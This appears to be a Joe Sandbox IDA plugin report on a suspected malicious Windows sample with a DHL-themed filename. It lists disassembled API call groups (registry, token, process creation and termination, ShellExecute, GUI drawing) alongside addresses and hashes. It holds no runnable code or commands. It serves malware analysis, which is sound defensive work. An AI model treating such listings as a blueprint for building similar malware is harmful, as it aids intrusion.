                                                                                      • GetWindowRect.USER32(?,?), ref: 00035EF8
                                                                                      Similarity
                                                                                      • API ID: Rect$Client$Window$Screen
                                                                                      • String ID:
                                                                                      • API String ID: 1296646539-0
                                                                                      APIs
                                                                                      • __allrem.LIBCMT ref: 000600BA
                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 000600D6
                                                                                      • __allrem.LIBCMT ref: 000600ED
                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0006010B
                                                                                      • __allrem.LIBCMT ref: 00060122
                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00060140
                                                                                      Similarity
                                                                                      • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                                                      • String ID:
                                                                                      • API String ID: 1992179935-0
                                                                                      APIs
                                                                                      • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,000582D9,000582D9,?,?,?,0006644F,00000001,00000001,8BE85006), ref: 00066258
                                                                                      • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,0006644F,00000001,00000001,8BE85006,?,?,?), ref: 000662DE
                                                                                      • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,8BE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 000663D8
                                                                                      • __freea.LIBCMT ref: 000663E5
                                                                                        • Part of subcall function 00063820: RtlAllocateHeap.NTDLL(00000000,?,00101444,?,0004FDF5,?,?,0003A976,00000010,00101440,000313FC,?,000313C6,?,00031129), ref: 00063852
                                                                                      • __freea.LIBCMT ref: 000663EE
                                                                                      • __freea.LIBCMT ref: 00066413
                                                                                      Similarity
                                                                                      • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                                      • String ID:
                                                                                      • API String ID: 1414292761-0
                                                                                      APIs
                                                                                        • Part of subcall function 00039CB3: _wcslen.LIBCMT ref: 00039CBD
                                                                                        • Part of subcall function 000BC998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,000BB6AE,?,?), ref: 000BC9B5
                                                                                        • Part of subcall function 000BC998: _wcslen.LIBCMT ref: 000BC9F1
                                                                                        • Part of subcall function 000BC998: _wcslen.LIBCMT ref: 000BCA68
                                                                                        • Part of subcall function 000BC998: _wcslen.LIBCMT ref: 000BCA9E
                                                                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 000BBCCA
                                                                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 000BBD25
                                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 000BBD6A
                                                                                      • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 000BBD99
                                                                                      • RegCloseKey.ADVAPI32(?,?,00000000), ref: 000BBDF3
                                                                                      • RegCloseKey.ADVAPI32(?), ref: 000BBDFF
                                                                                      Similarity
                                                                                      • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpperValue
                                                                                      • String ID:
                                                                                      • API String ID: 1120388591-0
                                                                                      APIs
                                                                                      • VariantInit.OLEAUT32(00000035), ref: 0008F7B9
                                                                                      • SysAllocString.OLEAUT32(00000001), ref: 0008F860
                                                                                      • VariantCopy.OLEAUT32(0008FA64,00000000), ref: 0008F889
                                                                                      • VariantClear.OLEAUT32(0008FA64), ref: 0008F8AD
                                                                                      • VariantCopy.OLEAUT32(0008FA64,00000000), ref: 0008F8B1
                                                                                      • VariantClear.OLEAUT32(?), ref: 0008F8BB
                                                                                      Similarity
                                                                                      • API ID: Variant$ClearCopy$AllocInitString
                                                                                      • String ID:
                                                                                      • API String ID: 3859894641-0
                                                                                      APIs
                                                                                        • Part of subcall function 00037620: _wcslen.LIBCMT ref: 00037625
                                                                                        • Part of subcall function 00036B57: _wcslen.LIBCMT ref: 00036B6A
                                                                                      • GetOpenFileNameW.COMDLG32(00000058), ref: 000A94E5
                                                                                      • _wcslen.LIBCMT ref: 000A9506
                                                                                      • _wcslen.LIBCMT ref: 000A952D
                                                                                      • GetSaveFileNameW.COMDLG32(00000058), ref: 000A9585
                                                                                      Strings
                                                                                      Similarity
                                                                                      • API ID: _wcslen$FileName$OpenSave
                                                                                      • String ID: X
                                                                                      • API String ID: 83654149-3081909835
                                                                                      APIs
                                                                                        • Part of subcall function 00049BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00049BB2
                                                                                      • BeginPaint.USER32(?,?,?), ref: 00049241
                                                                                      • GetWindowRect.USER32(?,?), ref: 000492A5
                                                                                      • ScreenToClient.USER32(?,?), ref: 000492C2
                                                                                      • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 000492D3
                                                                                      • EndPaint.USER32(?,?,?,?,?), ref: 00049321
                                                                                      • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 000871EA
                                                                                        • Part of subcall function 00049339: BeginPath.GDI32(00000000), ref: 00049357
                                                                                      Similarity
                                                                                      • API ID: BeginPaintWindow$ClientLongPathRectRectangleScreenViewport
                                                                                      • String ID:
                                                                                      • API String ID: 3050599898-0
                                                                                      APIs
                                                                                      • InterlockedExchange.KERNEL32(?,000001F5), ref: 000A080C
                                                                                      • ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 000A0847
                                                                                      • EnterCriticalSection.KERNEL32(?), ref: 000A0863
                                                                                      • LeaveCriticalSection.KERNEL32(?), ref: 000A08DC
                                                                                      • ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 000A08F3
                                                                                      • InterlockedExchange.KERNEL32(?,000001F6), ref: 000A0921
                                                                                      Similarity
                                                                                      • API ID: CriticalExchangeFileInterlockedReadSection$EnterLeave
                                                                                      • String ID:
                                                                                      • API String ID: 3368777196-0
                                                                                      • Opcode ID: 4f882486d06a1cb7e686c8384425643d1226456533b61cc18896f8db54cf3d2b
                                                                                      • Instruction ID: 71259f09b0bc7c67c83d5b6d8c6510bc64e90561b43ce635db7e6e8edfdcf5cc
                                                                                      • Opcode Fuzzy Hash: 4f882486d06a1cb7e686c8384425643d1226456533b61cc18896f8db54cf3d2b
                                                                                      • Instruction Fuzzy Hash: EF417C71900209EFEF149F94DC85AAAB7B8FF05310F1440B9ED049A297DB34DE65DBA4
                                                                                      APIs
                                                                                      • IsWindowVisible.USER32(?), ref: 00094C95
                                                                                      • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00094CB2
                                                                                      • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00094CEA
                                                                                      • _wcslen.LIBCMT ref: 00094D08
                                                                                      • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00094D10
                                                                                      • _wcsstr.LIBVCRUNTIME ref: 00094D1A
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen_wcsstr
                                                                                      • String ID:
                                                                                      • API String ID: 72514467-0
                                                                                      • Opcode ID: 05d782d67f21562f6d7b48a65d0946b8b92ed2e062514894d24145849c61c914
                                                                                      • Instruction ID: e5fb9e37c81d5dd5043aaecb2a0de297d0f4b1db03d7578f3acb23c3500075d8
                                                                                      • Opcode Fuzzy Hash: 05d782d67f21562f6d7b48a65d0946b8b92ed2e062514894d24145849c61c914
                                                                                      • Instruction Fuzzy Hash: E3210476205200BBFF655B29ED49E7F7BD8DF45750F108039F809CA192EA75CC42A6A0
                                                                                      APIs
                                                                                        • Part of subcall function 00033AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00033A97,?,?,00032E7F,?,?,?,00000000), ref: 00033AC2
                                                                                      • _wcslen.LIBCMT ref: 000A587B
                                                                                      • CoInitialize.OLE32(00000000), ref: 000A5995
                                                                                      • CoCreateInstance.OLE32(000CFCF8,00000000,00000001,000CFB68,?), ref: 000A59AE
                                                                                      • CoUninitialize.OLE32 ref: 000A59CC
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: CreateFullInitializeInstanceNamePathUninitialize_wcslen
                                                                                      • String ID: .lnk
                                                                                      • API String ID: 3172280962-24824748
                                                                                      • Opcode ID: d8f0e2c173a8407b7911d779ff82c73e2a62ab2aa10b8e4a9438bbb2b7cb37dd
                                                                                      • Instruction ID: e5a5d98775eef7b89711e8b605d24676225dbd06c237bf0208f07ba436b9074d
                                                                                      • Opcode Fuzzy Hash: d8f0e2c173a8407b7911d779ff82c73e2a62ab2aa10b8e4a9438bbb2b7cb37dd
                                                                                      • Instruction Fuzzy Hash: EBD173756087019FC714DF64C880A6ABBE5FF8A712F14885DF8899B362DB31EC45CB92
                                                                                      APIs
                                                                                        • Part of subcall function 00090FB4: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00090FCA
                                                                                        • Part of subcall function 00090FB4: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00090FD6
                                                                                        • Part of subcall function 00090FB4: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00090FE5
                                                                                        • Part of subcall function 00090FB4: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00090FEC
                                                                                        • Part of subcall function 00090FB4: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00091002
                                                                                      • GetLengthSid.ADVAPI32(?,00000000,00091335), ref: 000917AE
                                                                                      • GetProcessHeap.KERNEL32(00000008,00000000), ref: 000917BA
                                                                                      • HeapAlloc.KERNEL32(00000000), ref: 000917C1
                                                                                      • CopySid.ADVAPI32(00000000,00000000,?), ref: 000917DA
                                                                                      • GetProcessHeap.KERNEL32(00000000,00000000,00091335), ref: 000917EE
                                                                                      • HeapFree.KERNEL32(00000000), ref: 000917F5
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                                                                      • String ID:
                                                                                      • API String ID: 3008561057-0
                                                                                      • Opcode ID: ce6b420bc5b2197d253a9f286765d9465857605c13af4b8b7097f30153f19abe
                                                                                      • Instruction ID: 571de6aa6e5702d74064996e85e3836c0b7797af20140c2c6ee086486bb4977c
                                                                                      • Opcode Fuzzy Hash: ce6b420bc5b2197d253a9f286765d9465857605c13af4b8b7097f30153f19abe
                                                                                      • Instruction Fuzzy Hash: 57119A32604206EFEF109FA5CC49FEEBBB9EB42355F144058F84597220C739A940EB60
                                                                                      APIs
                                                                                      • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 000914FF
                                                                                      • OpenProcessToken.ADVAPI32(00000000), ref: 00091506
                                                                                      • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00091515
                                                                                      • CloseHandle.KERNEL32(00000004), ref: 00091520
                                                                                      • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0009154F
                                                                                      • DestroyEnvironmentBlock.USERENV(00000000), ref: 00091563
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                                                      • String ID:
                                                                                      • API String ID: 1413079979-0
                                                                                      • Opcode ID: ebd549cd64be38eda69fdd15b5c56242c558374d07258c81bdb7fec0affbd9d5
                                                                                      • Instruction ID: e0e0519a718c4bcd2fdf7093feaa0ee62edd3b42f16e3935530ea7ca74711e36
                                                                                      • Opcode Fuzzy Hash: ebd549cd64be38eda69fdd15b5c56242c558374d07258c81bdb7fec0affbd9d5
                                                                                      • Instruction Fuzzy Hash: 8D11297260024AEBEF118F98ED49FDE7BA9FF48744F154115FA09A2060C375CE61EB60
                                                                                      APIs
                                                                                      • GetLastError.KERNEL32(?,?,00053379,00052FE5), ref: 00053390
                                                                                      • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0005339E
                                                                                      • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 000533B7
                                                                                      • SetLastError.KERNEL32(00000000,?,00053379,00052FE5), ref: 00053409
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: ErrorLastValue___vcrt_
                                                                                      • String ID:
                                                                                      • API String ID: 3852720340-0
                                                                                      • Opcode ID: 778434e4e4f06dd8d2eb4f22cf8adf9d19768b67d9a1dba9bbd97dfec62c4c4a
                                                                                      • Instruction ID: cea13594802ff829677e8b4cf21a98ea1902eabdaf47cef0922292eaa048adc5
                                                                                      • Opcode Fuzzy Hash: 778434e4e4f06dd8d2eb4f22cf8adf9d19768b67d9a1dba9bbd97dfec62c4c4a
                                                                                      • Instruction Fuzzy Hash: 7801F532609315AEF72527747D8ADA72A94DB053FB320422DFD10851F1EF154E0AA548
                                                                                      APIs
                                                                                      • GetLastError.KERNEL32(?,?,00065686,00073CD6,?,00000000,?,00065B6A,?,?,?,?,?,0005E6D1,?,000F8A48), ref: 00062D78
                                                                                      • _free.LIBCMT ref: 00062DAB
                                                                                      • _free.LIBCMT ref: 00062DD3
                                                                                      • SetLastError.KERNEL32(00000000,?,?,?,?,0005E6D1,?,000F8A48,00000010,00034F4A,?,?,00000000,00073CD6), ref: 00062DE0
                                                                                      • SetLastError.KERNEL32(00000000,?,?,?,?,0005E6D1,?,000F8A48,00000010,00034F4A,?,?,00000000,00073CD6), ref: 00062DEC
                                                                                      • _abort.LIBCMT ref: 00062DF2
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: ErrorLast$_free$_abort
                                                                                      • String ID:
                                                                                      • API String ID: 3160817290-0
                                                                                      • Opcode ID: dabe36bb641a8daab7fb1edea3764177573c8ef941e688e46bc8625d1d72cedd
                                                                                      • Instruction ID: d2e89997e129d24fcf63bf3b3af217df9c8b94417d26b27c0d4dbfc57664b319
                                                                                      • Opcode Fuzzy Hash: dabe36bb641a8daab7fb1edea3764177573c8ef941e688e46bc8625d1d72cedd
                                                                                      • Instruction Fuzzy Hash: D9F0C831A05E0127E2622734BC16EAE259BAFC27A1F260418F928961D3EF2889015270
                                                                                      APIs
                                                                                        • Part of subcall function 00049639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00049693
                                                                                        • Part of subcall function 00049639: SelectObject.GDI32(?,00000000), ref: 000496A2
                                                                                        • Part of subcall function 00049639: BeginPath.GDI32(?), ref: 000496B9
                                                                                        • Part of subcall function 00049639: SelectObject.GDI32(?,00000000), ref: 000496E2
                                                                                      • MoveToEx.GDI32(?,-00000002,00000000,00000000), ref: 000C8A4E
                                                                                      • LineTo.GDI32(?,00000003,00000000), ref: 000C8A62
                                                                                      • MoveToEx.GDI32(?,00000000,-00000002,00000000), ref: 000C8A70
                                                                                      • LineTo.GDI32(?,00000000,00000003), ref: 000C8A80
                                                                                      • EndPath.GDI32(?), ref: 000C8A90
                                                                                      • StrokePath.GDI32(?), ref: 000C8AA0
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                                                      • String ID:
                                                                                      • API String ID: 43455801-0
                                                                                      • Opcode ID: 6c45bd2f41d66901de25dfc1eede3655f0d6fd0f654db478d29bc16650242590
                                                                                      • Instruction ID: 37bc52b5127a5d8e3340a82d4ea5b1a9e91207618819996dcb33d18f6d579dd7
                                                                                      • Opcode Fuzzy Hash: 6c45bd2f41d66901de25dfc1eede3655f0d6fd0f654db478d29bc16650242590
                                                                                      • Instruction Fuzzy Hash: 38110576400108FFEB129F90DC88EAA7FACEB08354F048426FA599A1A1C7759D95DFA0
                                                                                      APIs
                                                                                      • GetDC.USER32(00000000), ref: 00095218
                                                                                      • GetDeviceCaps.GDI32(00000000,00000058), ref: 00095229
                                                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00095230
                                                                                      • ReleaseDC.USER32(00000000,00000000), ref: 00095238
                                                                                      • MulDiv.KERNEL32(000009EC,?,00000000), ref: 0009524F
                                                                                      • MulDiv.KERNEL32(000009EC,00000001,?), ref: 00095261
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: CapsDevice$Release
                                                                                      • String ID:
                                                                                      • API String ID: 1035833867-0
                                                                                      • Opcode ID: 58386c49cd1928ab9c6fe79766913985956c79141d07f3ab96a990cef36f62f0
                                                                                      • Instruction ID: edf96cbd0c39c1b155ecddcd1aa4c1bfda6ab6dc44ba9fe89e4bc84296aea43d
                                                                                      • Opcode Fuzzy Hash: 58386c49cd1928ab9c6fe79766913985956c79141d07f3ab96a990cef36f62f0
                                                                                      • Instruction Fuzzy Hash: BE018475A01704BBFF105BA6DC49E5EBFB8FF44351F044065FA08A7291D6709800CB60
APIs
• MapVirtualKeyW.USER32(0000005B,00000000), ref: 00031BF4
• MapVirtualKeyW.USER32(00000010,00000000), ref: 00031BFC
• MapVirtualKeyW.USER32(000000A0,00000000), ref: 00031C07
• MapVirtualKeyW.USER32(000000A1,00000000), ref: 00031C12
• MapVirtualKeyW.USER32(00000011,00000000), ref: 00031C1A
• MapVirtualKeyW.USER32(00000012,00000000), ref: 00031C22
Memory Dump Source
• Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
• Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
Similarity
• API ID: Virtual
• String ID:
• API String ID: 4278518827-0
APIs
• PostMessageW.USER32(?,00000010,00000000,00000000), ref: 0009EB30
• SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 0009EB46
• GetWindowThreadProcessId.USER32(?,?), ref: 0009EB55
• OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0009EB64
• TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0009EB6E
• CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0009EB75
Similarity
• API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
• String ID:
• API String ID: 839392675-0
APIs
• GetClientRect.USER32(?), ref: 00087452
• SendMessageW.USER32(?,00001328,00000000,?), ref: 00087469
• GetWindowDC.USER32(?), ref: 00087475
• GetPixel.GDI32(00000000,?,?), ref: 00087484
• ReleaseDC.USER32(?,00000000), ref: 00087496
• GetSysColor.USER32(00000005), ref: 000874B0
Similarity
• API ID: ClientColorMessagePixelRectReleaseSendWindow
• String ID:
• API String ID: 272304278-0
APIs
• WaitForSingleObject.KERNEL32(?,000000FF), ref: 0009187F
• UnloadUserProfile.USERENV(?,?), ref: 0009188B
• CloseHandle.KERNEL32(?), ref: 00091894
• CloseHandle.KERNEL32(?), ref: 0009189C
• GetProcessHeap.KERNEL32(00000000,?), ref: 000918A5
• HeapFree.KERNEL32(00000000), ref: 000918AC
Similarity
• API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
• String ID:
• API String ID: 146765662-0
APIs
  • Part of subcall function 00037620: _wcslen.LIBCMT ref: 00037625
• GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 0009C6EE
• _wcslen.LIBCMT ref: 0009C735
• SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 0009C79C
• SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 0009C7CA
Strings
Similarity
• API ID: ItemMenu$Info_wcslen$Default
• String ID: 0
• API String ID: 1227352736-4108050209
APIs
• ShellExecuteExW.SHELL32(0000003C), ref: 000BAEA3
  • Part of subcall function 00037620: _wcslen.LIBCMT ref: 00037625
• GetProcessId.KERNEL32(00000000), ref: 000BAF38
• CloseHandle.KERNEL32(00000000), ref: 000BAF67
Strings
Similarity
• API ID: CloseExecuteHandleProcessShell_wcslen
• String ID: <$@
• API String ID: 146682121-1426351568
APIs
• GetWindowRect.USER32(00EFE340,?), ref: 000C62E2
• ScreenToClient.USER32(?,?), ref: 000C6315
• MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,?,?,?), ref: 000C6382
Strings
Similarity
• API ID: Window$ClientMoveRectScreen
• String ID: p]
• API String ID: 3880355969-1923361398
APIs
• CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00097206
• SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 0009723C
• GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 0009724D
• SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 000972CF
Strings
Similarity
• API ID: ErrorMode$AddressCreateInstanceProc
• String ID: DllGetClassObject
• API String ID: 753597075-1075368562
APIs
• SendMessageW.USER32(?,00001024,00000000,?), ref: 000C5352
• GetWindowLongW.USER32(?,000000F0), ref: 000C5375
• SetWindowLongW.USER32(?,000000F0,00000000), ref: 000C5382
• InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 000C53A8
Strings
Similarity
• API ID: LongWindow$InvalidateMessageRectSend
• String ID: p]
• API String ID: 3340791633-1923361398
APIs
• ClientToScreen.USER32(?,?), ref: 000C769A
• GetWindowRect.USER32(?,?), ref: 000C7710
• PtInRect.USER32(?,?,000C8B89), ref: 000C7720
• MessageBeep.USER32(00000000), ref: 000C778C
Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2012949642.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2012934264.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2012999798.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2013035319.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2013049699.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_30000_rDHL8350232025-2.jbxd
                                                                                      Similarity
                                                                                      • API ID: Rect$BeepClientMessageScreenWindow
                                                                                      • String ID: p]
                                                                                      • API String ID: 1352109105-1923361398
                                                                                      APIs
                                                                                        • Part of subcall function 00039CB3: _wcslen.LIBCMT ref: 00039CBD
                                                                                        • Part of subcall function 00093CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00093CCA
                                                                                      • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00091E66
                                                                                      • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00091E79
                                                                                      • SendMessageW.USER32(?,00000189,?,00000000), ref: 00091EA9
